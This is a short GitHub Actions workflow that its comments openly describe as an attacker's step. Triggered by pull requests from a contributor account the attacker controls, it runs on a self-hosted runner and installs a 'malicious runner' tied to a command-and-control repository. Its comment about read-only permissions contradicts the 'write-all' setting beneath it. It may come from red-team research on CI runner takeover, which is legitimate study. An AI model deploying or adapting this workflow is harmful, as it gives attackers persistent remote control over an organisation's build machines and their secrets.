name: Install Runner on Runner

# Permissions are limited to read-only in pull requests
permissions: write-all

# Controls when the workflow will run
on:
  # Triggers the workflow on pull request events for the "main" branch
  # As the attacker is now a contributor, this will run without approval
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs:
  install_runner:
    # Target the self-hosted runner's tags
    # More tags can be added to target a specific runner (e.g [self-hosted, Linx])
    # If multiple runners are present in the repo/org/enterprise with these tags
    # The first available matching runner will be used for the workflow
    runs-on: self-hosted

    steps:
      # Runs a set of commands using the runner's shell
      # These commands install the new malicious runner on the C2 repo
      - name: Run a multi-line script
        run: |
          cd malicious-runner
          ./run.sh
